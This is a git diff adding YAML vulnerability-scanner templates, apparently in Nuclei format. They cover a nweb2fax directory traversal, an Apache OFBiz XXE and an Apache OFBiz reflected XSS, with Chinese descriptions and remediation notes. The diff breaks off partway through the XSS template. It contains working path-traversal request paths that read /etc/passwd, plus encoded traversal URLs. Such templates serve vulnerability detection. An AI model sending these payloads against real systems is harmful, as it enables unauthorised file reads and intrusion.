+ - '{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css'
+ - '{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css'
+ method: GET
diff --git a/config/51pwn/yaml/nweb2fax/CVE-2008-6668.yaml b/config/51pwn/yaml/nweb2fax/CVE-2008-6668.yaml
new file mode 100755
index 000000000..0591a03cd
--- /dev/null
+++ b/config/51pwn/yaml/nweb2fax/CVE-2008-6668.yaml
@@ -0,0 +1,30 @@
+id: CVE-2008-6668
+info:
+ name: nweb2fax <= 0.2.7 Directory Traversal
+ author:
+ - l0ne1y
+ description: |-
+ nweb2fax 任意文件读取漏洞
+ nweb2fax 0.2.7及之前版本存在多个目录遍历漏洞。远程攻击者可以借助到comm.php的id参数和到viewrq.php的var_filename参数(参数值设置为\'\'..\'\'),读取任意文件。
+ severity: medium
+ remediation: |-
+ 临时修复方案:
+ 1、过滤\".\",使用户在url中不能回溯上级目录。
+ 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。
+ 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。
+ 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。
+ 5、用户下载文件之前进行权限校验。
+requests:
+- matchers:
+ - type: status
+ status:
+ - 200
+ - type: regex
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+ matchers-condition: and
+ path:
+ - '{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd'
+ - '{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd'
+ method: GET
diff --git a/config/51pwn/yaml/ofbiz/CVE-2018-8033.yaml b/config/51pwn/yaml/ofbiz/CVE-2018-8033.yaml
new file mode 100755
index 000000000..b72d04b8e
--- /dev/null
+++ b/config/51pwn/yaml/ofbiz/CVE-2018-8033.yaml
@@ -0,0 +1,35 @@
+id: CVE-2018-8033
+info:
+ name: Apache OFBiz XXE
+ author:
+ - l0ne1y
+ description: |-
+ Apache OFBiz HttpEngine XML外部实体安全漏洞
+ 在Apache OFBiz 16.11.01到16.11.04中,OFBiz HTTP引擎(`org.apache.ofbiz.service.engine.HttpEngine.java`)通过/ webtools / control / httpService端点处理对HTTP服务的请求。对httpService端点的POST和GET请求都可能包含三个参数:serviceName,serviceMode和serviceContext。通过使DOCTYPE指向外部引用来触发从主机返回秘密信息的有效负载,从而实现利用
+ severity: high
+ remediation: |
+ **官方修复方案**
+ 目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
+ [https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E](https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E)
+ **临时修复方案**
+ 1、禁用外部实体
+ 2、过滤用户提交的XML数据,关键词:]>&disclose;
diff --git a/config/51pwn/yaml/ofbiz/CVE-2020-1943.yaml b/config/51pwn/yaml/ofbiz/CVE-2020-1943.yaml
new file mode 100755
index 000000000..3b78f96a2
--- /dev/null
+++ b/config/51pwn/yaml/ofbiz/CVE-2020-1943.yaml
@@ -0,0 +1,36 @@
+id: CVE-2020-1943
+info:
+ name: Apache OFBiz Reflected XSS
+ author:
+ - l0ne1y
+ description: |+
+ Apache OFBiz 跨站脚本漏洞
+ Apache OFBiz是美国阿帕奇(Apache)软件基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。
+
+ Apache OFBiz中存在跨站脚本漏洞。远程攻击者可借助特制的URL利用该漏洞在用户浏览器中执行脚本。
+
+ severity: medium
+ remediation: |-
+ **官方修复方案**
+ 目前厂商已发布升级补丁以修复漏洞,详情请关注厂商主页:
+ https://www.apache.org/
+
+ **临时修复方案**
+ 对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。
+requests:
+- matchers:
+ - type: word
+ part: body
+ words:
+ - |